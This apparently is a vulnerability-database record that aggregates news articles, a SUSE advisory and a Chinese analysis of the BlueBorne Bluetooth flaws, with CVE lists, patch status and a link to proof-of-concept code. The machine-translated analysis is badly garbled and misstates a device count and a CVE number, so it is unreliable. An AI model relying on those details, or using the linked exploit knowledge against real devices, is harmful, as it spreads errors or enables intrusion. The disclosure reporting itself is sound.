"[![Bluetooth-blueborn-hacking](https://3.bp.blogspot.com/-UzPaOsWrdHE/WbgJXlIi7iI/AAAAAAAAAHg/YXxzWHRUcWcmye1sPmhjHm8FFq5DMTY6ACLcBGAs/s1600/Bluetooth-blueborn-hacking.png)](<https://3.bp.blogspot.com/-UzPaOsWrdHE/WbgJXlIi7iI/AAAAAAAAAHg/YXxzWHRUcWcmye1sPmhjHm8FFq5DMTY6ACLcBGAs/s1600/Bluetooth-blueborn-hacking.png>)\n\nIf you are using a Bluetooth enabled device, be it a smartphone, laptop, smart TV or any other IoT device, you are at risk of malware attacks that can carry out remotely to take over your device even without requiring any interaction from your side. \n \nSecurity researchers have just [discovered](<https://www.armis.com/blueborne/>) total 8 zero-day vulnerabilities in Bluetooth protocol that impact more than 5.3 Billion devices\u2014from Android, iOS, Windows and Linux to the Internet of things (IoT) devices\u2014using the short-range wireless communication technology. \n \nUsing these vulnerabilities, security researchers at IoT security firm Armis have devised an attack, dubbed **BlueBorne**, which could allow attackers to completely take over Bluetooth-enabled devices, spread malware, or even establish a \"man-in-the-middle\" connection to gain access to devices' critical data and networks without requiring any victim interaction. \n \nAll an attacker need is for the victim's device to have Bluetooth turned on and obviously, in close proximity to the attacker's device. Moreover, successful exploitation doesn't even require vulnerable devices to be paired with the attacker's device. \n \n\n\n### BlueBorne: Wormable Bluetooth Attack\n\n[![bluetooth-hacking](https://3.bp.blogspot.com/-fsl3agXN11E/WbgKQy6rBfI/AAAAAAAAAHs/pMGATx8opQEgq4thDgwxtknC7Q1IpZ1vACLcBGAs/s1600/bluetooth-hacking.png)](<https://3.bp.blogspot.com/-fsl3agXN11E/WbgKQy6rBfI/AAAAAAAAAHs/pMGATx8opQEgq4thDgwxtknC7Q1IpZ1vACLcBGAs/s1600/bluetooth-hacking.png>)\n\nWhat's more worrisome is that the BlueBorne attack could spread like the wormable WannaCry ransomware that emerged earlier this year and wrecked havoc by disrupting large companies and organisations worldwide. \n \nBen Seri, head of research team at Armis Labs, claims that during an experiment in the lab, his team was able to create a botnet network and install ransomware using the BlueBorne attack. \n\n\nHowever, Seri believes that it is difficult for even a skilled attacker to create a universal wormable exploit that could find Bluetooth-enabled devices, target all platform together and spread automatically from one infected device to others. \n\n\n> \"Unfortunately, this set of capabilities is extremely desireable to a hacker. BlueBorne can serve any malicious objective, such as cyber espionage, data theft, ransomware, and even creating large botnets out of IoT devices like the Mirai Botnet or mobile devices as with the recent [WireX Botne](<https://thehackernews.com/2017/08/android-ddos-botnet.html>)t,\" Armis said. \n\"The BlueBorne attack vector surpasses the capabilities of most attack vectors by penetrating secure \"air-gapped\" networks which are disconnected from any other network, including the internet.\"\n\n \n\n\n### Apply Security Patches to Prevent Bluetooth Hacking\n\n \nThe security firm responsibly disclosed the vulnerabilities to all the major affected companies a few months ago\u2014including Google, Apple and Microsoft, Samsung and Linux Foundation. \n \nThese vulnerabilities include: \n \n\n\n * Information Leak Vulnerability in Android (CVE-2017-0785)\n * Remote Code Execution Vulnerability (CVE-2017-0781) in Android's Bluetooth Network Encapsulation Protocol (BNEP) service\n * Remote Code Execution Vulnerability (CVE-2017-0782) in Android BNEP's Personal Area Networking (PAN) profile\n * The Bluetooth Pineapple in Android\u2014Logical flaw (CVE-2017-0783)\n * Linux kernel Remote Code Execution vulnerability (CVE-2017-1000251)\n * Linux Bluetooth stack (BlueZ) information leak vulnerability (CVE-2017-1000250)\n * The Bluetooth Pineapple in Windows\u2014Logical flaw (CVE-2017-8628)\n * Apple Low Energy Audio Protocol Remote Code Execution vulnerability (CVE Pending)\nGoogle and Microsoft have already made security patches available to their customers, while Apple iOS devices running the most recent version of its mobile operating system (that is 10.x) are safe. \n\n\n> \u201cMicrosoft released security updates in July and customers who have Windows Update enabled and applied the security updates, are protected automatically. We updated to protect customers as soon as possible, but as a responsible industry partner, we withheld disclosure until other vendors could develop and release updates.\u201d \u2013 a Microsoft spokesperson said.\n\n**What's worst? **All iOS devices with 9.3.5 or older versions and over 1.1 Billion active Android devices running older than Marshmallow (6.x) are vulnerable to the BlueBorne attack. \n \nMoreover, millions of smart Bluetooth devices running a version of Linux are also vulnerable to the attack. Commercial and consumer-oriented Linux platform (Tizen OS), BlueZ and 3.3-rc1 are also vulnerable to at least one of the BlueBorne bugs. \n \nAndroid users need to wait for security patches for their devices, as it depends on your device manufacturers. \n \nIn the meantime, they can install \"[BlueBorne Vulnerability Scanner](<https://play.google.com/store/apps/details?id=com.armis.blueborne_detector>)\" app (created by Armis team) from Google Play Store to check if their devices are vulnerable to BlueBorne attack or not. If found vulnerable, you are advised to turn off Bluetooth on your device when not in use.\n", "modified": "2017-09-12T17:53:59", "published": "2017-09-12T05:52:00", "id": "THN:649BE2C710B04C213ECB85D95D5F229A", "href": "https://thehackernews.com/2017/09/blueborne-bluetooth-hacking.html", "type": "thn", "title": "BlueBorne: Critical Bluetooth Attack Puts Billions of Devices at Risk of Hacking", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2018-12-23T03:50:22", "bulletinFamily": "unix", "cvelist": ["CVE-2016-9800", "CVE-2016-9801"], "description": "This update for bluez fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2016-9800: Fixed a buffer overflow in pin_code_reply_dump function\n (bsc#1013721)\n - CVE-2016-9801: Fixed a buffer overflow in set_ext_ctrl function\n (bsc#1013732)\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n", "edition": 1, "modified": "2018-12-23T00:12:30", "published": "2018-12-23T00:12:30", "id": "OPENSUSE-SU-2018:4259-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-12/msg00064.html", "title": "Security update for bluez (moderate)", "type": "suse", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "myhack58": [{"lastseen": "2017-09-29T14:08:54", "bulletinFamily": "info", "cvelist": ["CVE-2017-1000250", "CVE-2017-0781", "CVE-2017-0785", "CVE-2017-1000251", "CVE-2017-0782"], "edition": 1, "description": "The other day, and armis burst a series of Bluetooth flaws, no war no perception of the receiving system can be a bit can be hacked, and essentially impact all of the Bluetooth equipment, the persecution of the immeasurable, can be seen here https://www.armis.com/blueborne/ to understand how it guards to be: just the phone turn on the Bluetooth, it can be a long moderation. Nowadays mobile phones are so many, the application of this flaws written worm of the object, then can be again is a mobile version of low with wannacry. We 360Vulpecker Team in the know to these coherent information, Blaster stops the follow-up elucidating it. armis gives them the whitepaper, on the Bluetooth architecture, and the few flaws of elucidating possible to say that the exception is too small, the first film hair. No they did not give out these flaws of the PoC or is the exp, just to give a for Android\u201cBlueBorne detection app\", what, then the inverse of this invention is only to detect a system patch date. So I picked up a wave \u7259\u6167, these few flaws then elucidating a bit, then taking poc to write out: \n* CVE-2017-1000250 Linux bluetoothd process information leakage \n* CVE-2017-1000251 Linux kernel-stack overflow \n* CVE-2017-0785 Android com. android. bluetooth the process of information leakage \n* CVE-2017-0781 Android com. android. bluetooth process stack overflow \n* CVE-2017-0782 Android com. android. bluetooth process stack overflow \nThe above PoC code is in \nhttps://github.com/marsyy/littl_tools/tree/master/bluetooth \nBecause it is because of these few flaws only from the zero beginning to engage the Bluetooth, so it should be some elucidating not in place for the premises, also Please the way the big cattle shows. \n0x01 Bluetooth architecture and code spread \nHere the first should be dishing out armis of the paper in the figure: \n! [](/Article/UploadPic/2017-9/201792913526931. png? www. myhack58. com) \nFigure on the Bluetooth of each structured stakeholder DESCRIPTION is very detailed, not we're here temporarily just need to care so a few layers: HCI, L2CAP, AND BNEP, with the SDP. BNEP and SDP is more than the lower offices, the HCI at the bottom, indirect and Bluetooth equipment. And bearing in Bluetooth-do and the underlying equipment between the bridges, also is the L2CAP layer. Each layer has its agreements, the provisions of the data organization of the layout, all the layers of the data packet combined together, is a complete Bluetooth package a SDP packet as an example: the \n! [](/Article/UploadPic/2017-9/201792913526181. png? www. myhack58. com) \nWhile the provisions of the agreement of the architecture is the figure stated, but the specific implementation is divisive, Linux with the BlueZ, and now of Android with BlueDroid, but also for both architectures say The code of the specific spread. \nBlueZ \nIn Linux, using the BlueZ architecture, by the bluetoothd to supply BNEP,SDP these compare to the lower offices, and the L2CAP layer is on the inner core outside. To deal with BlueZ We of the SDP and L2CAP uncomparable to elucidating the. \n1, to achieve the SDP-do the code in the code directory/src/sdp, this sdp-client. c is it the client, the sdp-server. c is it do end. We're elucidating the flaws are long flaws, to is results are out in-do-end outside, let's focus on the Deposit dependents-do end. And do end the focus of the code, it should be Is it butt by the packet disposal process, this process by the sdp-request. c to achieve. When the L2CAP layer SDP data, will trigger the sdp-server. c io_session_event function to obtain the data packet, by the sdp-request. c The handle_request function dispose(how to dispose of, the subsequent flaws in elucidating the time and then tell): a \nstatic gboolean io_session_event(GIOChannel *chan, GIOCondition cond, gpointer data) \n{ \n... \nlen = recv(sk, &hdr, sizeof(sdp_pdu_hdr_t), MSG_PEEK); //get the SDP header data, to obtain the SDP data giant \nif (len int) len sizeof(sdp_pdu_hdr_t)) { \nsdp_svcdb_collect_all(sk); \nreturn FALSE; \n} \n\nsize = sizeof(sdp_pdu_hdr_t) + ntohs(hdr. plen); \nbuf = malloc(size); \nif (! buf) \nreturn TRUE; \n\nlen = recv(sk, buf, size, 0); //get the complete data packet \n... \nhandle_request(sk, buf, len); \n\nreturn TRUE; \n} \n2, The L2CAP layer of code in the kernel, here I am to Linux 4.2.8 of this code, for example. the l2cap layer is important from /net/bluetooth/l2capcore. c and/net/bluetooth/l2cap_sock. c to achieve. l2cap_core. c implements the L2CAP agreement of important content, l2cap_sock. c via the process of registering sock agreements supplied to this layer for the userspace interface. Strange we care a L2CAP butt by the data packet after the disposal process, the L2CAP data by the HCI layer transmission snapped past, in hci_core. c hci_rx_work function \nstatic void hci_rx_work(struct work_struct *work) \n{ \n\nwhile ((skb = skb_dequeue(&hdev->rx_q))) { \n/* Send copy to monitor */ \nhci_send_to_monitor(hdev, skb); \n\n... \nswitch (bt_cb(skb)->pkt_type) { \ncase HCI_EVENT_PKT: \nBT_DBG(\"%s Event packet\", hdev->name); \nhci_event_packet(hdev, skb); \nbreak; \n\ncase HCI_ACLDATA_PKT: \nBT_DBG(\"%s ACL data packet\", hdev->name); \nhci_acldata_packet(hdev, skb); \n\n\n**[1] [[2]](<89526_2.htm>) [[3]](<89526_3.htm>) [[4]](<89526_4.htm>) [[5]](<89526_5.htm>) [[6]](<89526_6.htm>) [[7]](<89526_7.htm>) [[8]](<89526_8.htm>) [[9]](<89526_9.htm>) [[10]](<89526_10.htm>) [next](<89526_2.htm>)**\n", "modified": "2017-09-29T00:00:00", "published": "2017-09-29T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/89526.htm", "id": "MYHACK58:62201789526", "title": "BlueBorne Bluetooth flaws vulnerability bug depth research and PoC-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-13T19:14:23", "bulletinFamily": "info", "cvelist": ["CVE-2017-1000250", "CVE-2017-0781", "CVE-2017-0785", "CVE-2017-8628", "CVE-2017-0783", "CVE-2017-0782"], "edition": 1, "description": "If you use a Bluetooth-enabled device, whether smartphone, laptop, or Smart TV, Smart Car, or other IoT devices, have to be careful. Recent researchers found the Bluetooth Protocol, 8 0-day vulnerabilities, of which 3 are classified as severity level. These vulnerabilities may affect the 53 million smart devices, Android, iOS, Windows, Linux, system devices, and IoT devices, etc. as long as the use of Bluetooth technology, it is possible to caught. \n! [](/Article/UploadPic/2017-9/2017913204432802. png? www. myhack58. com) \nArmis companies, a researcher will use this 8 a vulnerability named BlueBorne it. Hackers can exploit these vulnerabilities to initiate a remote attack that does not require any user interaction will be able to take over the equipment, spread malicious programs or even man in the middle attacks, the access network device and obtain the device key data. \nAs long as your device open Bluetooth, and in the hack device of Bluetooth connection range, the hacker will be able to attack, even without a successful connection. \nHaving a worm propagation characteristics, can have a serious impact \nThe researchers found that BlueBorne has worm propagation characteristics, can be like WannaCry as the worldwide spread rapidly, disrupting the company, the organization's network. Armis lab, a research group leader Ben Seri represents, in the study of these vulnerabilities when they find out you can use BlueBorne create a botnet, and install ransomware. But he also believes that highly skilled attackers are very difficult to exploit these vulnerabilities to initiate a global worm attack, because at the same time to find all Bluetooth-enabled devices, at the same time for all the platform to initiate attacks, and the use of an infected device to automatically a wide range of spread, these three points are very difficult to achieve. \nHowever, BlueBorne can be used for network monitoring, data theft, extortion, and even the use of IoT devices create is similar to Mirai a large botnet, or use your mobile device to create similar to the WireX botnet and other malicious activity, the harm can not be ignored. \nFirst, spread through the air, making the attacks more infectious and spread effortlessly.; and \nSecond, BlueBorne attacks can bypass current security measures, and not to be found, because the traditional method does not guard against airborne threats. Airborne assault may also allow a hacker to\u201csecurity\u201dof an isolated network not connected to the Internet, nor connect to the Internet in any other device, which may endanger the industrial system, government agencies and critical infrastructure; \nFinally, with the traditional malicious software or attacks, this attack requires no user interaction, the user need not click on links or download suspicious files, don't need to take any action to start the attack. \n! [](/Article/UploadPic/2017-9/2017913204433877. png? www. myhack58. com) \nThe researchers said the vulnerability is by far the most serious Bluetooth vulnerability. Prior to the identification to the Bluetooth vulnerability exists only on the Protocol level, but BlueBorne was present in the implementation level, the ability to bypass a variety of authentication mechanisms, to achieve the the target device to completely take over. \nArmis reminder: be wary of the BlueBorne with physical devices combined attack. For example, a go to the Bank Parcel Delivery courier may carry a maliciously encoded Bluetooth device. Once he entered the Bank, and this device will just infect other people's devices, and let the attacker in the original security of the network to find the stronghold. \nAffect the wide range, as soon as patched \nAccording to researcher disclosure, these 8 vulnerabilities are: \nAndroid Bluetooth network encapsulation Protocol remote code execution vulnerability, CVE-2017-0781\uff09 \nAndroid Bluetooth network encapsulation Protocol Personal Area\uff08PAN\uff09in the Protocol file remote code execution vulnerability, CVE-2017-0782) \nAndroid Bluetooth Pineapple logical Vulnerability(CVE-2017-0783) \nAndroid information disclosure Vulnerability(CVE-2017-0785) \nLinux kernel remote code execution vulnerability, CVE-2017-1000250) \nThe Linux Bluetooth stack(BlueZ) information disclosure Vulnerability(CVE-2017-1000250) \nWindows Bluetooth Pineapple logical Vulnerability(CVE-2017-8628) \nApple low-power audio Protocol remote code execution vulnerability(CVE Pending) \nA vulnerability is discovered, the researchers first time to report to all potentially affected major corporations, including Google, Apple, Microsoft, Samsung and the Linux Foundation. Wherein the affected area is as follows: \nAndroid: Android all version mobile phones, tablets and wearable devices are subject to the above four Android Bluetooth vulnerability. And using only the Bluetooth low power consumption of Android devices are not affected. Google in 9 months of security fixes have been issued related to the patch. \nWindows: from Vista, after all Windows versions are affected. Microsoft says Windows Phone will not be affected by BlueBorne impact. In fact, Microsoft has in the 7 months it quietly posted insurance payments have been Windows Bluetooth Pineapple logical Vulnerability(CVE-2017-8628)of the patch, but in the 9 May 12, the repair may only disclose the details. \nLinux: all run BlueZ Linux equipment are subject to information disclosure Vulnerability, CVE-2017-1000250 impact; since 2011, the 10 on the release of 3.3-rc1 after the version of Linux are affected by a remote code execution vulnerability, CVE-2017-1000250 impact; Samsung Linux-based Tizen system is also affected; \niOS: all iOS 9.3.5 and previous versions of the iPhone, iPad and iPod devices, the Apple TV 7.2.2 and prior versions are affected. iOS 10 has been to fix these vulnerabilities. \nAccording to the Armis estimates, about 20 billion for all affected equipment 40% equipment is unable to repair the vulnerability, because these devices version is too old, already no longer supported. \nCurrently, Google and Microsoft have released a repair patch, the user can download the update. While Apple's latest version of mobile system iOS 10. X is very secure. \nA Microsoft spokesperson said: \nMicrosoft in July released a security patch that enabled the Windows Update and apply the security update the users will be automatically protected. Our first update is in order to protect the safety of users; but, as a responsible industry partner, we temporarily not to disclose information until the other suppliers also developed and successfully released to update the program so far. \nAndroid users from the Google Play Store to install the Armis team development \u201cBlueBorne Vulnerability Scanner\u201d app for checking your device is vulnerable to BlueBorne attack. If you find the presence of the vulnerability, recommended that when not in use\u201cturn off\u201dthe Bluetooth function. \nThe following attached Armis of the vulnerability analysis report and a different system of attack demo video, take. to: \nReport original: http://go.armis.com/hubfs/BlueBorne%20Technical%20White%20Paper.pdf \n\n", "modified": "2017-09-13T00:00:00", "published": "2017-09-13T00:00:00", "id": "MYHACK58:62201789258", "href": "http://www.myhack58.com/Article/html/3/62/2017/89258.htm", "title": "Bluetooth agreement revealed eight major security vulnerability bug, capable of affecting fifty-three billion Bluetooth the efficacy of the equipment-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 0.0, "vector": "NONE"}}], "threatpost": [{"lastseen": "2018-10-06T22:53:11", "bulletinFamily": "info", "cvelist": ["CVE-2017-0781", "CVE-2017-0782", "CVE-2017-0783", "CVE-2017-0785", "CVE-2017-1000250", "CVE-2017-1000251", "CVE-2017-8628"], "description": "Researchers disclosed a bevy of Bluetooth vulnerabilities Tuesday that threaten billions of devices from Android and Apple smartphones to millions of printers, smart TVs and IoT devices that use the short-range wireless protocol.\n\nWorse, according to researchers at IoT security firm Armis that found the attack vector, the so-called \u201cBlueBorne\u201d attacks can jump from one nearby Bluetooth device to another wirelessly. It estimates that there are 5.3 billion devices at risk.\n\n\u201cIf exploited, the vulnerabilities could enable an attacker to take over devices, spread malware, or establish a \u2018man-in-the-middle\u2019 to gain access to critical data and networks without user interaction,\u201d according to the company. \u201cThe attack does not require the targeted device to be paired to the attacker\u2019s device, or even to be set on discoverable mode\u2026 since the Bluetooth process has high privileges on all operating systems, exploiting it provides virtually full control over the device.\u201d\n\nAs part of a coordinated disclosure, Armis said Google and Microsoft have already made patches available to their customers.\n\nIn a statement to Threatpost, Microsoft said: \u201cMicrosoft released security updates in July and customers who have Windows Update enabled and applied the security updates, are protected automatically. We updated to protect customers as soon as possible, but as a responsible industry partner, we withheld disclosure until other vendors could develop and release updates.\u201d\n\nMicrosoft\u2019s September Patch Tuesday disclosure lists one of the BlueBorne bugs (Bluetooth driver spoofing vulnerability \u2013 [CVE-2017-8628](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8628>)) as part of its security patches for the month.\n\nApple iOS devices running the most recent version of the OS (10.x) are safe, Armis said.\n\nAccording to researcher, only 45 percent of Android phones (960 million) are patchable, leaving 1.1 billion active Android devices older than Marshmallow (6.x) vulnerable.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2017/09/06222831/BlueBorne.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/09/06222831/BlueBorne.png>)\n\nAlso vulnerable are millions of smart Bluetooth devices running a version of Linux. Commercial and consumer-oriented versions of Linux (Tizen OS) are vulnerable to one of the BlueBorne bugs as are Linux devices running BlueZ and 3.3-rc1 (released in October 2011). All Windows computers since Windows Vista are affected, according to the researchers. Microsoft Windows Phones are not impacted.\n\n\u201cThis set of capabilities are every hacker\u2019s dream. BlueBorne can serve any malicious objective, such as cyber espionage, data theft, ransomware, and even creating large botnets out of IoT devices like the Mirai Botnet or mobile devices as with the recent WireX Botnet,\u201d according to the company.\n\n\u201cThis means almost every computer, mobile device, smart TV or other IoT device running on one of these operating systems is endangered by at least one of the eight vulnerabilities. This covers a significant portion of all connected devices globally,\u201d researchers said.\n\nIn all, BlueBorne consists of eight related vulnerabilities, three of which are classified as critical. The vulnerabilities were found in the Bluetooth implementations in Android, Microsoft, Linux and iOS. They include:\n\n*Linux kernel RCE vulnerability \u2013 CVE-2017-1000251\n\n*Linux Bluetooth stack (BlueZ) information leak vulnerability \u2013 CVE-2017-1000250\n\n*Android information leak vulnerability \u2013 CVE-2017-0785\n\n*Android RCE vulnerabilities CVE-2017-0781 & CVE-2017-0782\n\n*The Bluetooth Pineapple in Android \u2013 Logical Flaw CVE-2017-0783\n\n*The Bluetooth Pineapple in Windows \u2013 Logical Flaw CVE-2017-8628\n\n*Apple Low Energy Audio Protocol RCE vulnerability \u2013 CVE Pending\n\nAn attack scenario includes an adversary identifying Bluetooth devices nearby and using commonly tools to identify the MAC address of vulnerable Bluetooth devices.\n\n\u201cBy probing the device, the attacker can determine which operating system his victim is using, and adjust his exploit accordingly. The attacker will then exploit a vulnerability in the implementation of the Bluetooth protocol in the relevant platform and gain the access he needs to act on his malicious objective,\u201d researchers wrote.\n\nAt this stage the attacker can choose to create a Man-in-the-Middle attack and control the device\u2019s communication, or take full control over the device and use it for a wide array of cybercriminal purposes, researchers stated.\n\nIn order to traverse from one Bluetooth device to the next, researchers say attackers would take advantage of a feature called Bluetooth Mesh, introduced with Bluetooth 5, which allows Bluetooth devices to interconnect and form a larger network with a more elaborate and dense structure.\n\n\u201cThe automatic connectivity of Bluetooth, combined with the fact that nearly all devices have Bluetooth enabled by default, make these vulnerabilities all the more serious and pervasive,\u201d they said. \u201cOnce a device is infected with malware, it can then easily broadcast the malware to other Bluetooth-enable devices in its vicinity, either inside an office or in more public locations.\u201d\n\n\u201cThese silent attacks are invisible to traditional security controls and procedures. Companies don\u2019t monitor these types of device-to-device connections in their environment, so they can\u2019t see these attacks or stop them,\u201d said Yevgeny Dibrov, CEO of Armis. \u201cThe research illustrates the types of threats facing us in this new connected age.\u201d\n\nBlueBorne attack types boil down to two types. One, where an adversary goes undetected and targets a specific devices to execute code with the objective to gaining access corporate networks, systems, and data. The second scenario involves creating a Bluetooth Pineapple to sniff or redirect traffic.\n\n\u201cThese vulnerabilities are the most serious Bluetooth vulnerabilities identified to date. Previously identified flaws found in Bluetooth were primarily at the protocol level. These new vulnerabilities are at the implementation level, bypassing the various authentication mechanisms, and enabling a complete takeover of the target device,\u201d according to researchers.\n\n(_This story was updated Sept. 12, 1:30pm ET to include Microsoft\u2019s comments and CVE details._)\n", "modified": "2017-09-20T19:57:35", "published": "2017-09-12T09:00:09", "id": "THREATPOST:73E805ED92B364393EDD601647FE122D", "href": "https://threatpost.com/wireless-blueborne-attacks-target-billions-of-bluetooth-devices/127921/", "type": "threatpost", "title": "Wireless 'BlueBorne' Attacks Target Billions of Bluetooth Devices", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T13:05:46", "description": "### General Overview\r\n\r\nArmis Labs revealed a new attack vector endangering major mobile, desktop, and IoT operating systems, including Android, iOS, Windows, and Linux, and the devices using them. The new vector is dubbed \u201cBlueBorne\u201d, as it spread through the air (airborne) and attacks devices via Bluetooth. Armis has also disclosed eight related zero-day vulnerabilities, four of which are classified as critical. BlueBorne allows attackers to take control of devices, access corporate data and networks, penetrate secure \u201cair-gapped\u201d networks, and spread malware laterally to adjacent devices. Armis reported these vulnerabilities to the responsible actors, and is working with them as patches are being identified and released.\r\n\r\nHere is a quick overview of how BlueBorne works:\r\nhttps://youtu.be/LLNtZKpL0P8\r\n\r\n#### Blueborne Brief Overview\r\n\r\nWhat Is BlueBorne?\r\nBlueBorne is an attack vector by which hackers can leverage Bluetooth connections to penetrate and take complete control over targeted devices. BlueBorne affects ordinary computers, mobile phones, and the expanding realm of IoT devices. The attack does not require the targeted device to be paired to the attacker\u2019s device, or even to be set on discoverable mode. Armis Labs has identified eight zero-day vulnerabilities so far, which indicate the existence and potential of the attack vector. Armis believes many more vulnerabilities await discovery in the various platforms using Bluetooth. These vulnerabilities are fully operational, and can be successfully exploited, as demonstrated in our research. The BlueBorne attack vector can be used to conduct a large range of offenses, including remote code execution as well as Man-in-The-Middle attacks.\r\n\r\nAdditional Information: Download our Technical White Paper on BlueBorne\r\n\r\n### What Is The Risk?\r\n\r\nThe BlueBorne attack vector has several qualities which can have a devastating effect when combined. By spreading through the air, BlueBorne targets the weakest spot in the networks\u2019 defense \u2013 and the only one that no security measure protects. Spreading from device to device through the air also makes BlueBorne highly infectious. Moreover, since the Bluetooth process has high privileges on all operating systems, exploiting it provides virtually full control over the device.\r\n\r\nUnfortunately, this set of capabilities is extremely desireable to a hacker. BlueBorne can serve any malicious objective, such as cyber espionage, data theft, ransomware, and even creating large botnets out of IoT devices like the Mirai Botnet or mobile devices as with the recent WireX Botnet. The BlueBorne attack vector surpasses the capabilities of most attack vectors by penetrating secure \u201cair-gapped\u201d networks which are disconnected from any other network, including the internet.\r\n\r\n### How Wide Is The Threat?\r\n\r\n#### The threat posed by the BlueBorne attack vector\r\nThe BlueBorne attack vector can potentially affect all devices with Bluetooth capabilities, estimated at over 8.2 billion devices today. Bluetooth is the leading and most widespread protocol for short-range communications, and is used by devices of all kinds, from regular computers and mobile devices to IoT devices such as TVs, watches, cars, and even medical appliances. The latest published reports show more than 2 billion Android, 2 billion Windows, and 1 billion Apple devices in use. Gartner reports that there are 8 billions connected or IoT devices in the world today, many of which have Bluetooth.\r\n\r\n### What Is New About BlueBorne?\r\n\r\n#### A new airborne attack vector\r\nBlueBorne concerns us because of the medium by which it operates. Unlike the majority of attacks today, which rely on the internet, a BlueBorne attack spreads through the air. This works similarly to the two less extensive vulnerabilities discovered recently in a Broadcom Wi-Fi chip by Project Zero and Exodus. The vulnerabilities found in Wi-Fi chips affect only the peripherals of the device, and require another step to take control of the device. With BlueBorne, b attackers can gain full control right from the start. Moreover, Bluetooth offers a wider attacker surface than WiFi, almost entirely unexplored by the research community and hence contains far more vulnerabilities.\r\n\r\nAirborne attacks, unfortunately, provide a number of opportunities for the attacker. First, spreading through the air renders the attack much more contagious, and allows it to spread with minimum effort. Second, it allows the attack to bypass current security measures and remain undetected, as traditional methods do not protect from airborne threats. Airborne attacks can also allow hackers to penetrate secure internal networks which are \u201cair gapped,\u201d meaning they are disconnected from any other network for protection. This can endanger industrial systems, government agencies, and critical infrastructure.\r\n\r\nFinally, unlike traditional malware or attacks, the user does not have to click on a link or download a questionable file. No action by the user is necessary to enable the attack\r\n\r\n#### A comprehensive and severe threat\r\nThe BlueBorne attack vector requires no user interaction, is compatible to all software versions, and does not require any preconditions or configurations aside of the Bluetooth being active. Unlike the common misconception, Bluetooth enabled devices are constantly searching for incoming connections from any devices, and not only those they have been paired with. This means a Bluetooth connection can be established without pairing the devices at all. This makes BlueBorne one of the most broad potential attacks found in recent years, and allows an attacker to strike completely undetected.\r\n\r\n#### Next generation Bluetooth vulnerabilities\r\nIn the past, most Bluetooth vulnerabilities and security flaws originated in issues with the protocol itself, which were resolved in version 2.1 in 2007. Nearly all vulnerabilities found since were of low severity, and did not allow remote code execution. This transition occurred as the research community turned its eyes elsewhere, and did not scrutinize the implementations of the Bluetooth protocol in the different platforms, as it did with other major protocols.\r\n\r\nBluetooth is a difficult protocol to implement, which makes it prone to two kinds of vulnerabilities. On the one hand, vendors are likely to follow the protocol\u2019s implementation guidelines word-for-word, which means that when a vulnerability is found in one platform it might affect others. These mirrored vulnerabilities happened with CVE-2017-8628 and CVE-2017-0783 (Windows & Android MiTM) which are \u201cidentical twins\u201d. On the other hand, in some areas the Bluetooth specifications leave too much room for interpretation, causing fragmented methods of implementation in the various platforms, making each of them more likely to contain a vulnerability of its own.\r\n\r\nThis is why the vulnerabilities which comprise BlueBorne are based on the various implementations of the Bluetooth protocol, and are more prevalent and severe than those of recent years. We are concerned that the vulnerabilities we found are only the tip of the iceberg, and that the distinct implementations of the protocol on other platforms may contain additional vulnerabilities.\r\n\r\n#### A Coordinated Disclosure\r\nArmis reached out to the following actors to ensure a safe, secure, and coordinated response to the vulnerabilities identified.\r\n\r\nGoogle \u2013 Contacted on April 19, 2017, after which details were shared. Released public security update and security bulletin on September 4th, 2017. Coordinated disclosure on September 12th, 2017.\r\nMicrosoft \u2013 Contacted on April 19, 2017 after which details were shared. Updates were made on July 11. Public disclosure on September 12, 2017 as part of coordinated disclosure.\r\nApple \u2013 Contacted on August 9, 2017. Apple had no vulnerability in its current versions.\r\nSamsung \u2013 Contact on three separate occasions in April, May, and June. No response was received back from any outreach.\r\nLinux \u2013 Contacted August 15 and 17, 2017. On September 5, 2017, we connected and provided the necessary information to the the Linux kernel security team and to the Linux distributions security contact list and conversations followed from there. Targeting updates for on or about September 12, 2017 for coordinated disclosure.\r\n\r\n### Affected Devices\r\n\r\n#### The threat posed by the vulnerabilities Armis disclosed\r\nThe vulnerabilities disclosed by Armis affect all devices running on Android, Linux, Windows, and pre-version 10 of iOS operating systems, regardless of the Bluetooth version in use. This means almost every computer, mobile device, smart TV or other IoT device running on one of these operating systems is endangered by at least one of the eight vulnerabilities. This covers a significant portion of all connected devices globally.\r\n\r\n#### What Devices Are Affected?\r\n##### Android\r\nAll Android phones, tablets, and wearables (except those using only Bluetooth Low Energy) of all versions are affected by four vulnerabilities found in the Android operating system, two of which allow remote code execution (CVE-2017-0781 and CVE-2017-0782), one results in information leak (CVE-2017-0785) and the last allows an attacker to perform a Man-in-The-Middle attack (CVE-2017-0783).\r\n\r\nExamples of impacted devices:\r\n\r\n* Google Pixel\r\n* Samsung Galaxy\r\n* Samsung Galaxy Tab\r\n* LG Watch Sport\r\n* Pumpkin Car Audio System\r\n\r\nGoogle has issued a patch and notified its partners. It will be available for:\r\n\r\n* Nougat (7.0)\r\n* Marshmallow (6.0)\r\n\r\n\r\nGoogle has issued a security update patch and notified its partners. It was available to Android partners on August 7th, 2017, and made available as part of the September Security Update and Bulletin. We recommend that users check that Bulletin for the latest most accurate information. Android users should verify that they have the September 9, 2017 Security Patch Level,\r\n\r\nNote to Android users: To check if your device is risk or is the devices around you are at risk, download the Armis BlueBorne Scanner App on Google Play.\r\n\r\n##### Windows\r\n\r\nAll Windows computers since Windows Vista are affected by the \u201cBluetooth Pineapple\u201d vulnerability which allows an attacker to perform a Man-in-The-Middle attack 